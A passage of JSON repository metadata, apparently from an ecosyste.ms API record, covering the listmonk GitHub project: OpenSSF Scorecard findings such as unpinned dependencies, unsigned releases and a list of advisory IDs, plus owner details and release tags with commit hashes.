https://app.stepsecurity.io/secureworkflow/knadh/listmonk/github-pages.yml/master?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/github-pages.yml:48: update your workflow using https://app.stepsecurity.io/secureworkflow/knadh/listmonk/github-pages.yml/master?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/github-pages.yml:55: update your workflow using https://app.stepsecurity.io/secureworkflow/knadh/listmonk/github-pages.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/issues.yml:11: update your workflow using https://app.stepsecurity.io/secureworkflow/knadh/listmonk/issues.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/release.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/knadh/listmonk/release.yml/master?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/release.yml:20: update your workflow using https://app.stepsecurity.io/secureworkflow/knadh/listmonk/release.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/release.yml:23: update your workflow using https://app.stepsecurity.io/secureworkflow/knadh/listmonk/release.yml/master?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/release.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/knadh/listmonk/release.yml/master?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/release.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/knadh/listmonk/release.yml/master?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/release.yml:49: update your workflow using https://app.stepsecurity.io/secureworkflow/knadh/listmonk/release.yml/master?enable=pin","Warn: containerImage not pinned by hash: Dockerfile:1: pin your Docker image by updating alpine:latest to alpine:latest@sha256:4bcff63911fcb4448bd4fdacec207030997caf25e9bea4045fa6c8c44de311d1","Warn: containerImage not pinned by hash: dev/app.Dockerfile:1","Warn: containerImage not pinned by hash: dev/app.Dockerfile:3","Warn: pipCommand not pinned by hash: .github/workflows/github-pages.yml:27","Info:   0 out of   7 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of   7 third-party GitHubAction dependencies pinned","Info:   0 out of   3 containerImage dependencies pinned","Info:   0 out of   1 pipCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Signed-Releases","score":0,"reason":"Project has not signed or included provenance with any releases.","details":["Warn: release artifact v5.0.3 not signed: https://api.github.com/repos/knadh/listmonk/releases/230297465","Warn: release artifact v5.0.2 not signed: https://api.github.com/repos/knadh/listmonk/releases/223848166","Warn: release artifact v5.0.1 not signed: https://api.github.com/repos/knadh/listmonk/releases/220844848","Warn: release artifact v5.0.0 not signed: https://api.github.com/repos/knadh/listmonk/releases/215270409","Warn: release artifact v4.1.0 not signed: https://api.github.com/repos/knadh/listmonk/releases/184955432","Warn: release artifact v5.0.3 does not have provenance: https://api.github.com/repos/knadh/listmonk/releases/230297465","Warn: release artifact v5.0.2 does not have provenance: https://api.github.com/repos/knadh/listmonk/releases/223848166","Warn: release artifact v5.0.1 does not have provenance: https://api.github.com/repos/knadh/listmonk/releases/220844848","Warn: release artifact v5.0.0 does not have provenance: https://api.github.com/repos/knadh/listmonk/releases/215270409","Warn: release artifact v4.1.0 does not have provenance: https://api.github.com/repos/knadh/listmonk/releases/184955432"],"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"SAST","score":2,"reason":"SAST tool is not run on all commits -- score normalized to 2","details":["Warn: 4 commits out of 16 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":0,"reason":"13 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-v6h2-p8h4-qcjw","Warn: Project is vulnerable to: GHSA-3xgq-45jj-v275","Warn: Project is vulnerable to: GHSA-67mh-4wv8-2f99","Warn: Project is vulnerable to: GHSA-w455-mfq9-hf74","Warn: Project is vulnerable to: GHSA-mwcw-c2x4-8c55","Warn: Project is vulnerable to: GHSA-859w-5945-r5v3","Warn: Project is vulnerable to: GHSA-9hcv-j9pv-qmph","Warn: Project is vulnerable to: GHSA-w9jx-4g6g-rp7x","Warn: Project is vulnerable to: GHSA-438c-3975-5x3f","Warn: Project is vulnerable to: GHSA-5359-pvf2-pw78","Warn: Project is vulnerable to: GHSA-5j4c-8p2g-v4jx","Warn: Project is vulnerable to: GHSA-g3ch-rx76-35fx","Warn: Project is vulnerable to: GHSA-q7pp-wcgr-pffx"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-16T13:33:46.690Z","repository_id":37385001,"created_at":"2025-08-16T13:33:46.690Z","updated_at":"2025-08-16T13:33:46.690Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36904960,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-22T15:14:58.755Z","status":"online","status_checked_at":"2026-08-25T02:00:06.831Z","response_time":104,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"knadh","name":"Kailash Nadh","uuid":"547147","kind":"user","description":"Hobbyist developer | CTO @zerodha | Volunteer @fossunited @rainmatter-foundation  @indic-archive ","email":"","website":"https://nadh.in","location":"Bengaluru","twitter":null,"company":"Zerodha","icon_url":"https://avatars.githubusercontent.com/u/547147?u=2bfb14ccb1422e941579fc76643fa6765b86fdc9\u0026v=4","repositories_count":66,"last_synced_at":"2024-04-16T23:34:40.781Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/knadh","funding_links":[],"total_stars":24760,"followers":8406,"following":0,"created_at":"2022-11-02T16:51:40.399Z","updated_at":"2024-04-16T23:34:50.910Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/knadh","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/knadh/repositories"},"tags":[{"name":"v6.2.0","sha":"ef0a75872463f10a4848af6c547d1c057405453a","kind":"tag","published_at":"2026-06-26T10:19:10.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v6.2.0","html_url":"https://github.com/knadh/listmonk/releases/tag/v6.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v6.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v6.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v6.2.0/manifests"},{"name":"v6.1.0","sha":"1b5e8d38c778e869003486d3c38bc7a964661e91","kind":"tag","published_at":"2026-03-29T13:15:34.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v6.1.0","html_url":"https://github.com/knadh/listmonk/releases/tag/v6.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v6.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v6.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v6.1.0/manifests"},{"name":"nightly","sha":"85931b7dd02346a8363dc7658aee91316deee534","kind":"commit","published_at":"2026-01-24T07:49:11.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/nightly","html_url":"https://github.com/knadh/listmonk/releases/tag/nightly","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@nightly","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/nightly","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/nightly/manifests"},{"name":"v6.0.0","sha":"00f303c25b925e2e2b33f515f53a704c8d1e1645","kind":"tag","published_at":"2026-01-02T17:40:18.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v6.0.0","html_url":"https://github.com/knadh/listmonk/releases/tag/v6.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v6.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v6.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v6.0.0/manifests"},{"name":"v5.1.0","sha":"30846f84154659ad0b365a3d7c9fe2231dd0d3c2","kind":"tag","published_at":"2025-09-09T17:46:02.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v5.1.0","html_url":"https://github.com/knadh/listmonk/releases/tag/v5.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v5.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v5.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v5.1.0/manifests"},{"name":"v5.0.3","sha":"48643aa93ef6d70afe550d8f526546a4931bf695","kind":"tag","published_at":"2025-07-06T16:11:23.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v5.0.3","html_url":"https://github.com/knadh/listmonk/releases/tag/v5.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v5.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v5.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v5.0.3/manifests"},{"name":"v5.0.2","sha":"d27d2c32cf3af2d0b24e29ea5a686ba149b49b3e","kind":"tag","published_at":"2025-06-08T09:40:22.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v5.0.2","html_url":"https://github.com/knadh/listmonk/releases/tag/v5.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v5.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v5.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v5.0.2/manifests"},{"name":"v5.0.1","sha":"dc466fc76bde033d48af5fe89ffbd84bb7e194d3","kind":"tag","published_at":"2025-05-25T09:45:26.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v5.0.1","html_url":"https://github.com/knadh/listmonk/releases/tag/v5.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v5.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v5.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v5.0.1/manifests"},{"name":"v5.0.0","sha":"3b8a8c23c586dd7b7851844aae91a370e21ecf35","kind":"tag","published_at":"2025-04-28T18:48:26.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v5.0.0","html_url":"https://github.com/knadh/listmonk/releases/tag/v5.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v5.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v5.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v5.0.0/manifests"},{"name":"v4.1.0","sha":"0a27de16c6e23b7d4b84d4d91fe59bea10877ad1","kind":"tag","published_at":"2024-11-12T18:40:44.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v4.1.0","html_url":"https://github.com/knadh/listmonk/releases/tag/v4.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v4.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v4.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v4.1.0/manifests"},{"name":"v4.0.1","sha":"f5dfb0cf62f1097545ff315a5c1d9ac540d54b9e","kind":"tag","published_at":"2024-10-28T07:47:30.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v4.0.1","html_url":"https://github.com/knadh/listmonk/releases/tag/v4.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v4.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v4.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v4.0.1/manifests"},{"name":"v4.0.0","sha":"3894571d1ac0b5baa5bcb15a173e4e1020d7a113","kind":"tag","published_at":"2024-10-27T13:25:40.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v4.0.0","html_url":"https://github.com/knadh/listmonk/releases/tag/v4.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v4.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v4.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v4.0.0/manifests"},{"name":"v3.0.0","sha":"f9120d9b80b1d0d86f27e3f23edfb2ffe6f5b091","kind":"tag","published_at":"2024-02-04T11:18:22.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v3.0.0","html_url":"https://github.com/knadh/listmonk/releases/tag/v3.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v3.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v3.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v3.0.0/manifests"},{"name":"v2.5.1","sha":"a6a2b6982036eb6bebf9a1ff4d58ff4937ea3af1","kind":"tag","published_at":"2023-08-15T15:46:37.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v2.5.1","html_url":"https://github.com/knadh/listmonk/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"ea2f93ea066bc612b1161ba76324c11c8e495933","kind":"tag","published_at":"2023-08-10T18:32:51.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v2.5.0","html_url":"https://github.com/knadh/listmonk/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v2.5.0/manifests"},{"name":"v2.4.0","sha":"c668523c570519797e1e7f01958fe830378d253e","kind":"tag","published_at":"2023-03-20T13:48:00.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v2.4.0","html_url":"https://github.com/knadh/listmonk/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v2.4.0/manifests"},{"name":"v2.3.0","sha":"448f0e3428535bc93bc942c9867183f5adcaf057","kind":"tag","published_at":"2022-11-27T17:50:11.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v2.3.0","html_url":"https://github.com/knadh/listmonk/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v2.3.0/manifests"},{"name":"v2.2.0","sha":"bbbf28c5ce981738c485d6d0e94c89df0fef6763","kind":"tag","published_at":"2022-07-30T18:09:14.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v2.2.0","html_url":"https://github.com/knadh/listmonk/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v2.2.0/manifests"},{"name":"v2.1.0","sha":"0ecfb89f19e63da44df393b08cd2b21f90c79605","kind":"tag","published_at":"2022-02-12T15:24:59.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v2.1.0","html_url":"https://github.com/knadh/listmonk/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v2.1.0/manifests"},{"name":"v2.0.0","sha":"05585b701b56a9aa1f1a7f1cdadec44c19541055","kind":"tag","published_at":"2021-09-27T17:57:16.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v2.0.0","html_url":"https://github.com/knadh/listmonk/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v2.0.0/manifests"},{"name":"v1.1.0","sha":"b3612927c82bee987c2c2d20322232b9144a3c8a","kind":"tag","published_at":"2021-06-09T14:43:46.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v1.1.0","html_url":"https://github.com/knadh/listmonk/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v1.1.0/manifests"},{"name":"v1.0.0","sha":"95a81d17ced9766d40447364de12925b51c844fd","kind":"commit","published_at":"2021-05-16T11:24:55.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v1.0.0","html_url":"https://github.com/knadh/listmonk/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v1.0.0/manifests"},{"name":"v0.9.0-beta","sha":"e90fb1d88d15aea4fc7028cd96b1a274f92ab05e","kind":"commit","published_at":"2021-02-13T12:41:10.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v0.9.0-beta","html_url":"https://github.com/knadh/listmonk/releases/tag/v0.9.0-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v0.9.0-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.9.0-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.9.0-beta/manifests"},{"name":"v0.8.0-beta","sha":"cde0b4b42a3e0e18b7e08d701e5ca4482cd6fe73","kind":"commit","published_at":"2020-11-10T16:51:25.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v0.8.0-beta","html_url":"https://github.com/knadh/listmonk/releases/tag/v0.8.0-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v0.8.0-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.8.0-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.8.0-beta/manifests"},{"name":"v0.7.0-alpha","sha":"0f055eacb87030b55970f4870ff3a0b22b0dcaef","kind":"commit","published_at":"2020-08-09T14:32:43.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v0.7.0-alpha","html_url":"https://github.com/knadh/listmonk/releases/tag/v0.7.0-alpha","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v0.7.0-alpha","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.7.0-alpha","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.7.0-alpha/manifests"},{"name":"v0.6.2-alpha","sha":"82702ed5bc64c4cbc567b561f187bc3f8abe83b5","kind":"commit","published_at":"2020-05-25T06:25:02.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v0.6.2-alpha","html_url":"https://github.com/knadh/listmonk/releases/tag/v0.6.2-alpha","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v0.6.2-alpha","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.6.2-alpha","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.6.2-alpha/manifests"},{"name":"v0.6.1-alpha","sha":"18329ff052e62e74b9114d4e2126074c9845277b","kind":"commit","published_at":"2020-05-17T15:37:48.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v0.6.1-alpha","html_url":"https://github.com/knadh/listmonk/releases/tag/v0.6.1-alpha","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v0.6.1-alpha","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.6.1-alpha","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.6.1-alpha/manifests"},{"name":"v0.6.0-alpha","sha":"cb331b93418eecaffdfcdcc38c91606328afdf47","kind":"commit","published_at":"2020-05-16T18:09:40.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v0.6.0-alpha","html_url":"https://github.com/knadh/listmonk/releases/tag/v0.6.0-alpha","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v0.6.0-alpha","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.6.0-alpha","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.6.0-alpha/manifests"},{"name":"v0.5.2-alpha","sha":"b8d9ab10f29d8fc3c3dc0fcfb235ce453d8c58bf","kind":"commit","published_at":"2020-04-02T12:52:56.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v0.5.2-alpha","html_url":"https://github.com/knadh/listmonk/releases/tag/v0.5.2-alpha","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v0.5.2-alpha","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.5.2-alpha","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.5.2-alpha/manifests"},{"name":"v0.5.1-alpha","sha":"21ffe5fb02256a6e391b5e2ebe11554badee5ee5","kind":"commit","published_at":"2020-04-01T14:29:41.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v0.5.1-alpha","html_url":"https://github.com/knadh/listmonk/releases/tag/v0.5.1-alpha","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v0.5.1-alpha","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.5.1-alpha","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.5.1-alpha/manifests"},{"name":"v0.5.0-alpha","sha":"ad9ee7528d34ce19659a7aa963ada18baebddb0b","kind":"commit","published_at":"2020-03-08T10:40:34.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v0.5.0-alpha","html_url":"https://github.com/knadh/listmonk/releases/tag/v0.5.0-alpha","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v0.5.0-alpha","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.5.0-alpha","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.5.0-alpha/manifests"},{"name":"v0.4.0-alpha","sha":"62aa31b14cf651084a76aba0021106fd78911081","kind":"commit","published_at":"2020-02-09T13:45:14.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v0.4.0-alpha","html_url":"https://github.com/knadh/listmonk/releases/tag/v0.4.0-alpha","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v0.4.0-alpha","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.4.0-alpha","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.4.0-alpha/manifests"},{"name":"v0.3.3-alpha","sha":"9a88c2ed7b69bf020ccc95625788017f214a29c3","kind":"commit","published_at":"2020-02-06T10:09:43.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v0.3.3-alpha","html_url":"https://github.com/knadh/listmonk/releases/tag/v0.3.3-alpha","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v0.3.3-alpha","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.3.3-alpha","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.3.3-alpha/manifests"},{"name":"v0.3.2-alpha","sha":"047de697707e4a3ea23b53c7a1917f20edc9f8c2","kind":"commit","published_at":"2020-02-05T12:39:13.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v0.3.2-alpha","html_url":"https://github.com/knadh/listmonk/releases/tag/v0.3.2-alpha","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v0.3.2-alpha","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.3.2-alpha","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.3.2-alpha/manifests"},{"name":"v0.3.1-alpha","sha":"1064f1e4d8b1ef8d083f02254900b42c442e6e92","kind":"commit","published_at":"2020-01-19T15:19:01.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v0.3.1-alpha","html_url":"https://github.com/knadh/listmonk/releases/tag/v0.3.1-alpha","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v0.3.1-alpha","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.3.1-alpha","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.3.1-alpha/manifests"},{"name":"v0.3.0-alpha","sha":"ccd354df3f85259a0b88dffe4a51586aab01135b","kind":"commit","published_at":"2019-10-31T06:31:13.000Z","download_url":"https://codeloa